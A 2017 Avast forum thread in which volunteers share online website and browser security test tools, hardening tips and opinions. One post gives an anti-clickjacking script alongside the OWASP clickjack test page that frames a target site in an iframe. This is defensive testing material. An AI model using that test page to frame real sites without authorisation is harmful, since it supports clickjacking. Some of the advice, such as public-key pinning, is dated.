Apart from this we always have to harden and protect servers from known server exploits, wrong security settings and
against targeted phishing and malware attacks (but we have avast there, haven't we  ;D).

We should be particularly aware of mail servers, that banners aren't speaking too loud about versions used, but pinging certain mailservers without version info will produce them anyway. So test non-invasively via banners and functional tests
for what ESMTP functions are being supported (when we find no transport encryption support this means that all will be transported in clear txt over the Internet). Some Firewalls and Outdated Security Policies will only support pure SMTP,
meaning less attack but lack of transport encryption of sorts.

Also read here: https://blog.qualys.com/ssllabs/2016/09/06/is-http-public-key-pinning-dead

What was being tested?

- Qualys SSL labs score?
- High Tech Bridge HTTPS score?
- High Tech Bridge web security score?
- HTTPS implemented?
- DNSSEC implemented?
- HTTP Strict Transport Security Policy implemented?
- Weak cyphers support?
- CSP implemented?
- Unknown jQuery security updates?
- HTTPOnly Security not being set for cookie?
- live-Twitter Javascript code?
- Google Analytics active?
- Live Google advertising?
- Live Google Javascript Code?
- Type HTTP redirect?
- Wildcard Certificate or many domain names in certificate?
- Extended Validation Certificate?
- Certificate Transparency Certificate?
- Perfect Forward Security supported?
- HSTS Preloading vulnerability?
- X-Frame Options implemented
- X-Powered by Header?
- Autocomplete set at password field (now obsolete)?
- Same Site Protection not set for cookie?
- Publication of Technical Info?
- Client-Initiated-Secure-Renegotiation supported?
- Subresource Integrety (SRI) implemented?
- TLS 1.0 supported?
- Vulnerable to BEAST attack?
- Vulnerable to DROWn attack?
- OCSP Alert Sample configured?
- Public-Key-pinning implemented? (see link, seems dead now)
- X-XSS-Protection implemented?
- X-Content-Type-Options implemented?

Scan proposal info - info credits go out to security researcher, Sijmen Ruwhof.

polonus (volunteer website security analyst and website error-hunter)


Title: Re: Tests and other Media topics
Post by: polonus on February 24, 2017, 04:46:10 PM
Were you vulnerable to Cloudbleed?

Check with this extension: https://chrome.google.com/webstore/detail/cloudbleed-bookmark-check/egoobjhmbpflgogbgbihhdeibdfnedii/related

Does a website have CloudFlare: http://www.doesitusecloudflare.com/
Then check that website's SRI hash security status here: https://sritest.io/

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on February 24, 2017, 06:59:07 PM
In my particular case checking for cloudbleed-bookmark I found:
Quote
The following bookmarked sites may have been affected by Cloudbleed:

sritest.io
securityheaders.io
codefromthe70s.org
hetrixtools.com
yehg.net
cyberwarzone.com
adguard.com
downuptime.net

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 25, 2017, 04:41:40 PM
With the above list results in mind, we can then check here: http://cloudflarelistcheck.abal.moe/
So for instance adguard.com was affected. Then also check here: https://cloudbleedcheck.com/?domain=
Constant updates of list: https://github.com/pirate/sites-using-cloudflare/blob/master/README.md

pol



Title: Re: Tests and other Media topics
Post by: polonus on March 16, 2017, 12:44:11 PM
Word Press security checks we (Eddy, others and little old me) often perform here:
https://hackertarget.com/wordpress-security-scan/

Check for retirable jQuery libraries can be performed here: retire.insecurity.today/#
Same origin sri-hash issues: https://sritest.io/#
Additionally perform a scan here: https://sitecheck.sucuri.net/
and here: http://www.domxssscanner.com/scan?url=
Also test here for DNS issues and whether (hosting) name server versions are being exposed:
http://www.dnsinspect.com/
Get the test status results here: https://observatory.mozilla.org/
and here for cert issues: cryptoreport.websecurity.symantec.com

When we have all these third party combined test results we can start to secure the website built with Word Press as a CMS. First we start to mitigate the threats detected and then harden the system.

Mind you most important are your data. This should be cared for like good ripening wine.  ;)
An application can be easily be rebuilt any time, so consider application restore to the  freshness of fish,
fish should always be red at the gills. ;)  Update and patch, folks, always and continuously!

Even WordPress security suggestion sites could be suspicious like: -https://yoast.com/wordpress-security/

In a following posting I will suggest some steps you can take to better secure your Word Press website
and to harden it against abuse.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: bob3160 on March 16, 2017, 02:19:39 PM
(http://screencast-o-matic.com/screenshots/u/Lh/1489670337099-76511.png)
https://bob3160.wordpress.com/
Title: Re: Tests and other Media topics
Post by: polonus on March 16, 2017, 10:51:37 PM
German government officials warn against 20.000 vulnerable cloud environments

Check your cloud environment with that vulnerable software here:

https://scan.owncloud.com/ 

and here:

https://scan.nextcloud.com/

See this would be followed up and you could end such problems for the future:
https://en.wikipedia.org/wiki/General_Data_Protection_Regulation#Sanctions

Those that endanger the data of users, should be presented with a bill for the inconveniece
and not put up the social community with their costs and losses,
and keep all the profits to themselves.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 17, 2017, 01:17:08 PM
WordPress hardening - About username & password.

A nice tool for creating safer passwords for your WordPress CMS re: https://tools.arantius.com/password
and this one: https://strongpasswordgenerator.com/
and additionally this generator: https://www.random.org/strings/

A bad username/password combination is insecure. Do not use admin (make a new account named administrator) and passwords that can be revealed through brute forcing. Use a random name for your user base.
Never use the name of the website, use capitals, small characters, numbers and special characters.
Remember you could use spaces in between with password, so create a password sentence, like
"1 c@n M8K3  ^ l33t pa$$w0Rd".

Installatron is a good tool to create a random username and password. Change your password often, make it good, secure and random. Your users should do like wise, use Norton Password Generator or Strong Password Generator: https://identitysafe.norton.com/password-generator/

 User Enumeration is not available
It was not possible to easily enumerate usernames from the user ID's. This is a good thing, as it can add difficulty to brute force password attacks if the username is not able to be determined.

It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring. As this will reduce the chance of automated password attackers gaining access. However it is important to understand that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation.

Only the first two user ID's were tested with this scan, use the Nmap NSE enumeration scripts (use your own Nmap installation or try the adanced membership option ) to discover additional user ID's.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on March 17, 2017, 06:54:06 PM
Test your ssl connection in your browser here: https://badssl.com/
Also test here: https://testsafebrowsing.appspot.com/
Tested for a phish and got it right: http://testsafebrowsing.appspot.com/s/phishing.html
or http://testsafebrowsing.appspot.com/s/notif_pageload.html
Connection insecure: https://subdomain.preloaded-hsts.badssl.com/
Example: -http://www.degoudsbloem.nl/
Finally tested here: https://www.htbridge.com/ssl/?id=f00c790aaf4381d4ad23234e3f70e9768f10fe8b003aee51b3980ed88043b72d

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 20, 2017, 10:44:35 PM
@ the browser users here...

Test your browser's SSL-configuration.

Here: https://www.ssllabs.com/ssltest/viewMyClient.html
and
https://badssl.com/dashboard/  part of https://badssl.com/
and'
https://www.howsmyssl.com/
and
https://geekflare.com/ssl-test-certificate/  (with ten various SSL testing tools).

enjoy, my good avast friends, enjoy,

polonus

P.S. How the code is being maintained and updated (upgraded): https://github.com/chromium/badssl.com
Title: Re: Tests and other Media topics
Post by: REDACTED on March 25, 2017, 06:11:24 PM
Hi there!
I'm a developer and we are having some issues with avast and karspersky at www.langademy.com
We use webrtc to make video calls. Many users are having issues when they make webrtc calls because the AV blocks the webrtc resources on the navigator( at least in Chrome). Any idea of why is this happening?  :'(
Title: Re: Tests and other Media topics
Post by: Asyn on March 25, 2017, 06:31:19 PM
Hi there!
I'm a developer and we are having some issues with avast and karspersky at www.langademy.com
We use webrtc to make video calls. Many users are having issues when they make webrtc calls because the AV blocks the webrtc resources on the navigator( at least in Chrome). Any idea of why is this happening?  :'(
Start a new topic in V&W: https://forum.avast.com/index.php?action=post;board=4
Title: Re: Tests and other Media topics
Post by: mchain on March 25, 2017, 06:37:40 PM
https://www.quttera.com/detailed_report/www.langademy.com (https://www.quttera.com/detailed_report/www.langademy.com)
Title: Re: Tests and other Media topics
Post by: polonus on March 26, 2017, 07:37:49 PM
Advertised as Circumventing the Ghost Ban problem with this Uncensored Anonymous Search Page.
Takes you to a page that cannot be opened in https! Is not this any longer serviced by GoDaddy
and could it be this http searchsite keep track of those that search for alternative content and just adding to the Ghost Ban/Alternative News/FakeNews/Mainline News Controversy?????????

Re: -http://gibiru.com/

I would shun such a site nor bookmark it. Do we have similar problems here?: http://www.hongkiat.com/blog/private-search-engines/

polonus


Title: Re: Tests and other Media topics
Post by: polonus on April 12, 2017, 05:58:01 PM
In the light of the thousands of hacked WordPress websites, scan if your router is vulnerable here:

https://www.wordfence.com/blog/2017/04/check-your-router/#

Background read: https://www.wordfence.com/blog/2017/04/home-routers-attacking-wordpress/

polonus (volunteer website security analyst and website errror-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on April 12, 2017, 10:40:53 PM
Now when you tested and found it to be open, when your ISP provider does that, it is also their responsibility when you get hacked by Mirai botnet for example. Such IT spooks have all sorts of excuses.

Re: https://arstechnica.com/security/2016/11/notorious-iot-botnets-weaponize-new-flaw-found-in-millions-of-home-routers/ 

They know about this hole since 2014 and if they continue to leave it open it could be both sloppy IT managment and also gross negligence when the flaw is being abused.

The port is used for remote management by the provider. Test again here: https://www.grc.com/x/ne.dll?bh0bkyd2

Read: https://arstechnica.com/security/2016/11/notorious-iot-botnets-weaponize-new-flaw-found-in-millions-of-home-routers/

So when your provider leaves it open they want to remotely mess with your router settings. That is nasty. It is you that should do the router settings, at least that is what we think in Europe, it may be quite another story in the U.S. of A.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 15, 2017, 01:26:26 PM
Following Breaking News.

How to protect your firefox browser against  Unicode Phishing Attack?

With the firefox browser one could use the following work-around:
Quote
Open Firefox:

1. Enter the following txt into the address bar of firefox about:config
2. Read the alert and then proceed further.
3. Enter this txt  in into the address bar: punycode
4. You will now see this apear: network.IDN_show_punycode
5. Double click this item will make false change into true.
6. Close the tab page.   

Info credits go to:  Dongel

polonus
Title: Re: Tests and other Media topics
Post by: DavidR on April 15, 2017, 02:27:59 PM
Following Breaking News.

How to protect your firefox browser against  Unicode Phishing Attack?

With the firefox browser one could use the following work-around:
Quote
Open Firefox:

1. Enter the following txt into the address bar of firefox about:config
2. Read the alert and then proceed further.
3. Enter this txt  in into the address bar: punycode
4. You will now see this apear: network.IDN_show_punycode
5. Double click this item will make false change into true.
6. Close the tab page.   

Info credits go to:  Dongel

polonus

For me, having to edit the about:config for most people is a step to far as you would have to edit for individual issues.

Phishing in itself has to be covered through security based add-ons (or the browser itself), the likes of NoScript, RequestPolicy, etc. Not to mention Avast or other anti-virus.
Title: Re: Tests and other Media topics
Post by: polonus on April 16, 2017, 05:03:10 PM
Take the browser can identify you by the adblocker you use test.

Do it here: https://extensions.inrialpes.fr/

Detected extensions were trafficlight and adguard adblocker.

polonus
Title: Re: Tests and other Media topics
Post by: mchain on April 18, 2017, 03:42:35 AM
Take the browser can identify you by the adblocker you use test.

Do it here: https://extensions.inrialpes.fr/

Detected extensions were trafficlight and adguard adblocker.

polonus
Thanks Pol,

You got me testing a few setups and one in particular seemed to work well:  Opera in VPN Private mode.
Title: Re: Tests and other Media topics
Post by: polonus on April 25, 2017, 03:12:47 PM
Privacy-OS Tails 2.0 script with an excellent regular expression

Quote
: new RegExp('^(http|https):\/\/[a-z0-9\-_]+(\.[a-z0-9\-_]+)+([a-z0-9\-_\.,@\?^=%&;:/~\+#]*[a-z0-9\-\_#@\?^=%&;/~\+])?$', 'i');

Almost  perfect Rubular regular expression - emails are secure that way. Excellent, 99,9% secure.

Where in the code we detect this one: https://tails.boum.org/lib/js/mirror-dispatcher.js

Online tester here: https://regex101.com/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 30, 2017, 12:51:28 AM
How to stop this spy inside your browser.

Read about how font tracking with fonts.googleapis.com for instance is spying on you from inside the browser: http://fontfeed.com/archives/google-webfonts-the-spy-inside/

A great extension for those with relevant knowledge as to know how to toggle it, e.g. what to block and what to allow or add is:
Negotiator: https://chrome.google.com/webstore/detail/negotiator/lfopjlendebbnfddpgpoaahmpbgmffii

Just clicking and you see what's tracking you from where to where and how to block it eventually.
Consider what third party tracking you wanna block (somewhat like with Ghostery or Disconnect) or what you wanna allow,
considering the amount of functionality needed to do on the webpage what you plan to do, and whether you trust that
connection. So this is for advanced user, that knows what goes on beneath the hood of their browser of choice.

It reminds me much of Request Policy add-on for/in firefox and it is a great companion alongside uBlock and uMatrix extensions.
I'am quite charmed about the outlay, rather versatile little extension, folks.

polonus (volunteer website security analyst and website error hunter)
Title: Re: Tests and other Media topics
Post by: DavidR on April 30, 2017, 01:45:27 AM
How to stop this spy inside your browser.

Read about how font tracking with fonts.googleapis.com for instance is spying on you from inside the browser: http://fontfeed.com/archives/google-webfonts-the-spy-inside/

A great extension for those with relevant knowledge as to know how to toggle it, e.g. what to block and what to allow or add is:
Negotiator: https://chrome.google.com/webstore/detail/negotiator/lfopjlendebbnfddpgpoaahmpbgmffii
<snip>
polonus (volunteer website security analyst and website error hunter)

That is somewhat devious, what most would consider innocuous 'fonts.googleapis.com' like it was just using a font repository for a better range of founts on the website, very sneaky.
Title: Re: Tests and other Media topics
Post by: Lisandro on April 30, 2017, 10:49:44 PM
A great extension for those with relevant knowledge as to know how to toggle it, e.g. what to block and what to allow or add is:
Negotiator: https://chrome.google.com/webstore/detail/negotiator/lfopjlendebbnfddpgpoaahmpbgmffii
You're right: "for those with relevant knowledge" but also "with time to invest"... uBlock is doing part of that, but automatically...
Title: Re: Tests and other Media topics
Post by: DavidR on April 30, 2017, 11:20:01 PM
A great extension for those with relevant knowledge as to know how to toggle it, e.g. what to block and what to allow or add is:
Negotiator: https://chrome.google.com/webstore/detail/negotiator/lfopjlendebbnfddpgpoaahmpbgmffii
You're right: "for those with relevant knowledge" but also "with time to invest"... uBlock is doing part of that, but automatically...

I think that the RequestPolicy firefox add-on would probably cover most of this (if trying to block fonts.googleapis.com) and would appear to be less complex for the user.
Title: Re: Tests and other Media topics
Post by: mchain on May 16, 2017, 08:52:19 AM
Was working on another topic and came across this: 
http://securitypreview.zscaler.com/?utm_source=web-sticky-cta (http://securitypreview.zscaler.com/?utm_source=web-sticky-cta)

Take the test and see how you do.
Title: Re: Tests and other Media topics
Post by: digmor crusher on May 16, 2017, 07:08:24 PM
Well I tried this, got an F, pretty much failed everything.

I am running through a router with a firewall, Windows firewall, Emsisoft Anti Malware, MBAM (real time), Voodoo Shield, Ublock Origin, and block 3rd party cookies in Chrome.

So I think this test is a crock. How would anyone even pass these tests?
Title: Re: Tests and other Media topics
Post by: bob3160 on May 16, 2017, 08:23:21 PM
Well I tried this, got an F, pretty much failed everything.

I am running through a router with a firewall, Windows firewall, Emsisoft Anti Malware, MBAM (real time), Voodoo Shield, Ublock Origin, and block 3rd party cookies in Chrome.

So I think this test is a crock. How would anyone even pass these tests?
Purchase and install their product. :)
Title: Re: Tests and other Media topics
Post by: DavidR on May 16, 2017, 08:32:21 PM
Well I tried this, got an F, pretty much failed everything.

I am running through a router with a firewall, Windows firewall, Emsisoft Anti Malware, MBAM (real time), Voodoo Shield, Ublock Origin, and block 3rd party cookies in Chrome.

So I think this test is a crock. How would anyone even pass these tests?

I rarely if ever take these tests as to be able to even take the test, I would effectively have to drop my defences to be able to take the test and for me that is madness.

With just one level of defence in my browser,  Firefox with NoScript, RequestPolicy, uBlock Origin, CookieMonster, firefox with 3rd party cookies blocked, etc. etc. Zscaler is left spinning its wheels with nothing able to load, so no test or result. For me that is 100%
Title: Re: Tests and other Media topics
Post by: midnight on May 16, 2017, 09:54:06 PM
I took the test and got this popup with sound.
Title: Re: Tests and other Media topics
Post by: polonus on May 16, 2017, 10:08:47 PM
That is a good result, dear -midnight, it means the general testfile to see whether you av functions OK gives the right OK result.
Eicar is harmless, just to test whether your AV alerts where it should. Reason to be glad and satisfied.

polonus
Title: Re: Tests and other Media topics
Post by: mchain on May 18, 2017, 01:45:06 AM
Eicar Test is testing your WebShield blocking.  It works it would appear.

Point of the test is to point out how much further a consumer would have to go to button down their system to be similar to a corporate system; DavidR's system setup apparently will not even let the scripts involved run on his system, so he is good to go.  I'd say he was protected.
Title: Re: Tests and other Media topics
Post by: polonus on May 27, 2017, 05:02:21 PM
Antispam, feeding spammer with some anti spam to bite their teeth on: http://www.auditmypc.com/freescan/antispam.html

Another way to perform anti-spam: http://www.grall.name/posts/1/antiSpam-emailAddressObfuscation.html

URL decoder/encode: http://www.grall.name/posts/1/antiSpam-emailAddressObfuscation.html
& http://www.url-encode-decode.com/  &   https://2cyr.com/decode/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 27, 2017, 05:41:49 PM
See what is going on via this Threat Map: https://threatmap.fortiguard.com/
Maybe you see this: http://fortiguard.com/encyclopedia/ips/44037

Another one: http://map.norsecorp.com/

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on May 27, 2017, 05:59:44 PM
Your fortiguard link isn't working.
Title: Re: Tests and other Media topics
Post by: DavidR on May 27, 2017, 06:23:28 PM
See what is going on via this Threat Map: https://threatmap.fortiguard.com/
Maybe you see this: http://fortiguard.com/encyclopedia/ips/44037


Your fortiguard link isn't working.

Which one/s ?
I have been able to connect to all three links.
Title: Re: Tests and other Media topics
Post by: bob3160 on May 27, 2017, 07:16:27 PM
link ending in 44037
Title: Re: Tests and other Media topics
Post by: mchain on May 27, 2017, 07:21:10 PM
link ending in 44037
It's reachable for me.  See <snip> below:
Title: Re: Tests and other Media topics
Post by: bob3160 on May 27, 2017, 07:27:34 PM
link ending in 44037
It's reachable for me.  See <snip> below:
(http://screencast-o-matic.com/screenshots/u/Lh/1495906032757-72627.png)
Title: Re: Tests and other Media topics
Post by: Gopher John on May 27, 2017, 09:22:22 PM
No problems here for that link.
Title: Re: Tests and other Media topics
Post by: polonus on May 30, 2017, 11:05:39 AM
Oh those poor amateur PHP programmers: https://cdn.sstatic.net/insights/Img/Survey/2017/SalaryAndExperienceByLanguage.svg

Get a boost from javascript and study ethical hacking (pen-testing).

Not for me as a volunteer, but I won't complain.

polonus
Title: Re: Tests and other Media topics
Post by: DavidR on May 30, 2017, 11:24:40 AM
Oh those poor amateur PHP programmers: https://cdn.sstatic.net/insights/Img/Survey/2017/SalaryAndExperienceByLanguage.svg
<snip>
polonus

Wow, that was a trip down memory lane, some languages that I would have thought would have died by now. Possibly an indication of the number of years experience of the respondents, old languages, old programmers ;D

SQL - Ahh, whilst my last 4.5 years in the services we were on a number of projects that were using Oracle Forms that used SQL within that. With some of those old languages, I was surprised not to see COBOL still listed. I had a hard time on my COBOL course (3 weeks) with tables.
Title: Re: Tests and other Media topics
Post by: polonus on June 16, 2017, 07:36:09 PM
Create a list for your AS with Filter List Generator: https://www.dan.me.uk/filtergen

enjoy, also the other tools on that website.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 17, 2017, 09:56:35 PM
Do a IPv6 Leak Test: http://ipv6leak.com/
Also enjoy the other tests here: http://routersecurity.org/testrouter.php

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 21, 2017, 12:08:59 AM
Last 10 internal IPs you used, do the ring familiarity, test here: http://www.auditmypc.com/internal-ip-address.asp

polonus

Title: Re: Tests and other Media topics
Post by: REDACTED on June 21, 2017, 10:21:00 AM
Hi DavidR,

Agree with you and bob3160 here, https only or http nowhere are inferior solutions as we compare this to the combination of the no script and request policy extension, where we still have the complete avast! Shields protection against http malcoded content ((obfuscated) malscripts, malicious iFrames and various malicious redirects, backlinks to drive-by-malware). Additionally users have google safebrowsing, pre-scanning guidance, so in order to get infested you have to ignore warnings and this could be qualified as "unwise" user intervention. Https only and http nowhere extensions never helped against the PEBKAC problem as the main cause of malcode getting onto computers and peripherals,

polonus

I see some website they are both using https but some https having an exclamatory beside it and other https havent and green in color. What the different them, I read lots from internet that https is secure but why those two https are different.
Title: Re: Tests and other Media topics
Post by: DavidR on June 21, 2017, 11:01:59 AM
Generally the exclamation point is indicating mixed content on what is an https connection, e.g. they import content from an http source. Green would be confirming the https connection is all secure content.
Title: Re: Tests and other Media topics
Post by: polonus on June 21, 2017, 02:13:55 PM
Hi Vamert,

Many people think that  http.. versus https... will say something about the actual security of a particular website.
That is an often found misconception. Http or https only say something about a more secure connection between client and (web)server.

So in that sense the https-everywhere mission led by Google and EFF are in a sense more of a cosmetic nature and a lot of folks therefore misinterprete what the green padlock stands for. It may just say your connection does not let your accountname and password go as plain txt over the wires. Often we need more like sri-hashes generated especially for external links for google analytics etc, so the same origin protocol is being upheld, protecting from code injection to make the actual website more secure, as with security headers, etc. etc.

There are still loads of websites with problems not directing to https-everywhere or the implementation of https-only.

polonus (volunteer website security analyst and website error-hunter)

Title: Re: Tests and other Media topics
Post by: polonus on July 01, 2017, 10:13:29 PM
Mozilla on the success of the Https-Everywhere campaign: https://blog.mozilla.org/security/2017/06/28/analysis-alexa-top-1m-sites/

HTTPS:// of course an important security measure to be taken to safeguard a secure connection.

Still the https-everywhere project will be more of a cosmetical means to an end than anything else.
Also things may go drastically wrong, when automatic re-directs from http:/ to https:// fail.

Look where a lot of other issues are being found up to be insecure, despite https-everywhere: https://www.eff.org/https-everywhere/atlas/

Example for a site that comes "disabled by default": https://www.eff.org/https-everywhere/atlas/domains/openstreetmap.org.html

Secure and safe connections may be safeguarded, just like at home when the curtains are closed,
but what insecurity goes on behind closed curtains is a guess, and that insecurity should worry us to a greater extent.

A green padlock to rock us asleep. Behind that could come insecure cloud services,
a free account with a sub-domain soon no longer to be ours (afraid dot org for example).

And where website security is concerned we meet with quite some issues. The attached image speaks for itself.

We'd better educate those m- & p-developers to turn them into 'security savvy' coder pack,
and then all the other folks that work with website building and maintaining websites secure.

But one way or another these aims are always being grandly frustrated by those,
who have other importsant interests in keeping things as they are,
so the infrastructure stays insecure or becoming more insecure even so.

Excessive server info proliferatie for insecure nameservers. An immense problem in the linux infrastructure.
Some insecure servers lower down in the network could infest all of the rest, like with Poodle etc.

For aspx sites perform a scan an asafweb scan , do a little query on shodan or perform a dazzlepod ip scan.

What to do about malicious evil DNS? Re: https://www.theregister.co.uk/2016/02/16/glibc_linux_dns_vulernability/
Random example here: http://www.dnsinspect.com/ns1.com/10056192

What to do about insecure CMS like Joomla or WordPress like with this scanner? -
hackertarget.com/wordpress-security-scan/
with a random example: https://www.magereport.com/scan/?s=https://hacmint.com/

What to do about retirable jScript libraries? See: http://www.dnsinspect.com/ns1.com/10056192

What to do and how to generate when we find missing hashes here?: https://sritest.io/
or a bad status here: https://observatory.mozilla.org/

Also import the sources & sinks, we could stumble upon while scanning here: http://www.domxssscanner.com/

It seems it is overwhelming, that is why latest targeted cyberwar attacks were such a success or rather catastrophical.

When we gonna see a change for the better, will we ever live to see this?

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on July 02, 2017, 05:01:14 PM
Well to explain the point it the previous posting: https://blog.sucuri.net/2017/06/sql-injection-vulnerability-wp-statistics.html

Word Press as a CMS stays a problem-factory, scan here: hackertarget.com/wordpress-security-scan/

For sgl injection vuln.: www.domxssscanner.com

greets,

pol
Title: Re: Tests and other Media topics
Post by: polonus on July 04, 2017, 04:50:15 PM
Into CSS and source mapping. Nice resources here for ye all:
https://www.thecssninja.com/demo/source_mapping/

Also nice to use: https://www.w3schools.com/tags/tryit.asp?filename=tryhtml5_input_type_hidden
Could lead to flags for cloaking in the is it hacked scan (alert cloaking is when Googlebot has a difference in bytes shown to Google's).

enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 11, 2017, 10:05:32 AM
New technology to restore trusting your documents:

https://proofofexistence.com/

Newest online bitcoin blockchain technology to handle your docs integrity,
amidst situations where your trust in certain services comes cheap,
where you have to find your way amidst Big Media Fake News and Social Media Censorship,
where you may not longer come to trust your own gubberment etc.

Now you have to fence for yourselves, folks, as you always had to.

Enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 11, 2017, 12:30:17 PM
A nice liitle proggie: https://blog.didierstevens.com/programs/usbvirusscan/
Read also: http://geeknizer.com/top-usb-hacks-pwn/ 2015

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 12, 2017, 06:49:53 PM
Why uBlock Origin now has a new companion extension named uBlock Origin Extra?
Read: https://www.theregister.co.uk/2017/08/11/ad_blocker_bypass_code/
and https://github.com/gorhill/uBO-Extra
Get it here: https://chrome.google.com/webstore/detail/ublock-origin-extra/pgdnlhfefecpicbbihgmbmffkjpaplco/related

enjoy,

pol
Title: Re: Tests and other Media topics
Post by: Asyn on August 12, 2017, 06:54:34 PM
Hi Pol, some valuable info, thanks a lot..!! :)
Title: Re: Tests and other Media topics
Post by: DavidR on August 12, 2017, 07:25:53 PM
Why uBlock Origin now has a new companion extension named uBlock Origin Extra?
Read: https://www.theregister.co.uk/2017/08/11/ad_blocker_bypass_code/
and https://github.com/gorhill/uBO-Extra
Get it here: https://chrome.google.com/webstore/detail/ublock-origin-extra/pgdnlhfefecpicbbihgmbmffkjpaplco/related

enjoy,

pol

I'm starting to find uBlock Origin bit of a pain in the backside.

I'm continually having to switch it off as it is blocking things that I feel are too aggressive. Even trying to exclude those sites doesn't seem to resolve the problem as it would appear that the exclusion is only for originating site (image1 & image3). 

It is nowhere near flexible enough, I would like to see it closer to Request policy that allows connections from a site to 3rd party connections and not exclude it for every site (image2).  So I'm honestly considering binning it and not adding additional functionality.
Title: Re: Tests and other Media topics
Post by: bob3160 on August 12, 2017, 07:54:08 PM
Sometimes (IMHO) the cure is worse than the disease. :)
Title: Re: Tests and other Media topics
Post by: DavidR on August 12, 2017, 08:17:57 PM
Sometimes (IMHO) the cure is worse than the disease. :)

This could be the case for some. AdBlockPlus wasn't bad, quite flexible, but then it shot itself in the foot with trust worthy issues.
Title: Re: Tests and other Media topics
Post by: bob3160 on August 12, 2017, 08:20:54 PM
I right now am putting up with extra adds,
One program is too aggressive and not really adjustable.
The other lost it's trust and it will be a long road back towards again earning it.
Title: Re: Tests and other Media topics
Post by: Asyn on August 12, 2017, 08:29:37 PM
I'm starting to find uBlock Origin bit of a pain in the backside.

I'm continually having to switch it off as it is blocking things that I feel are too aggressive. Even trying to exclude those sites doesn't seem to resolve the problem as it would appear that the exclusion is only for originating site (image1 & image3). 

It is nowhere near flexible enough, I would like to see it closer to Request policy that allows connections from a site to 3rd party connections and not exclude it for every site (image2).  So I'm honestly considering binning it and not adding additional functionality.
Hi Dave, uBO is highly flexible and adjustable, guess you didn't dig deep enough yet.
Anyway, I don't want to drag this thread OT, so if you want/need help let me/us know...
Title: Re: Tests and other Media topics
Post by: polonus on August 14, 2017, 01:42:00 PM
DNS CAA should be implemented now during September. It is a kind of genuine administrative control whether the domain name is in the DNS record. More vague then HPKP testing for browsers where it checked against whitelisted public keys.

In case of DNS CAA with all the different CA's the check is not often well performed and alo often social engineering sensitive.

Check: https://caatest.co.uk/vendercartoabom.com.br where we could not find any - hostname does not match certificate for this PHISHING site, certificate not correctly been installed with Hostgator Wildcard - Comodo. (carding abuse?).

How to generate CAA records: https://sslmate.com/labs/caa/

Testing: https://www.ssllabs.com/ssltest/  also compare to cryptoreport.websecurity.symantec.com/checker/
and https://observatory.mozilla.org/  and http://www.dnsinspect.com/

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on August 15, 2017, 10:57:08 PM
Check your old add-ons for compatibility: https://addons.mozilla.org/en-US/firefox/addon/add-on-compatibility-reporter/

Read about the profile clash to come: https://github.com/Aris-t2/ClassicThemeRestorer/issues/299

pol
Title: Re: Tests and other Media topics
Post by: DavidR on August 16, 2017, 12:00:01 AM
Check your old add-ons for compatibility: https://addons.mozilla.org/en-US/firefox/addon/add-on-compatibility-reporter/
<snip>

Ha, these are going to be pretty redundant in three months as support for Legacy updates will end. It is said that 80% of the add-ons on the Mozilla add-ons are still Legacy add-ons.

But you don't need the add-on-compatibility-reporter, simply going to the firefox add-ons section in the browser as all Legacy add-ons are already flagged as such.  Only one of my add-ons isn't Legacy.
Title: Re: Tests and other Media topics
Post by: bob3160 on August 16, 2017, 12:21:45 AM
(http://screencast-o-matic.com/screenshots/u/Lh/1502835654354-43451.png)
Looks like
Avast Online Security needs some work.
Title: Re: Tests and other Media topics
Post by: polonus on August 20, 2017, 12:55:01 PM
Why polonus is scanning what he is scanning and reporting what he is reporting for instance in the "virus and worms"?
All of it in vain? Some here pay attention, although as a rule it goes by greatly unnoticed....
(No I do not mean you, Eddy, no I do not mean you Pondus and others).

Nobody gives a hoot what you detect...
Read here why...https://medium.com/@homakov/why-it-sucks-to-be-a-security-researcher-8a1d17fbffe8

link info credits go to Egor Homakov

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on August 24, 2017, 07:51:08 PM
protection against clickjacking

In the document HEAD element, add the following
Code: [Select]
<style id="antiClickjack">body{display:none !important;}</style>

<script type="text/javascript">
   if (self === top) {
       var antiClickjack = document.getElementById("antiClickjack");
       antiClickjack.parentNode.removeChild(antiClickjack);
   } else {
       top.location = self.location;
   }
</script>
info credits go to StackOverflow's Prabin Tp

Check for clickjacking with https://asafaweb.com/  &  https://www.owasp.org/index.php/Testing_for_Clickjacking_(OTG-CLIENT-009)
like
Code: [Select]
<html>
   <head>
     <title>Clickjack test page</title>
   </head>
   <body>
     <p>Website is vulnerable to clickjacking!</p>
     <iframe src="http://www.target.site" width="500" height="500"></iframe>
   </body>
</html>
Protection for client users: https://www.lifewire.com/how-to-protect-yourself-from-clickjacking-attacks-2487178

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 24, 2017, 10:04:13 PM
With Mozilla now more and more going the Google Chrome monopoly way.
What is your experience with the following browser?

https://cliqz.com/en/

I see the old firefox mssion fans now turn to Palemoon or Opera. On Android we have Brave.

Will all browsers be "just another browser" soon or will there still be an escape for those,
 that want to avoid crap, scam, spam, mal-ads, tracking and other forms of extensive profiling?

The more you protect the more you stand out to these evil forces that invade your devices.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 25, 2017, 06:57:58 PM
Google opens up somewhat more on Titan:

Discussion on it here: https://news.ycombinator.com/item?id=15093129
and
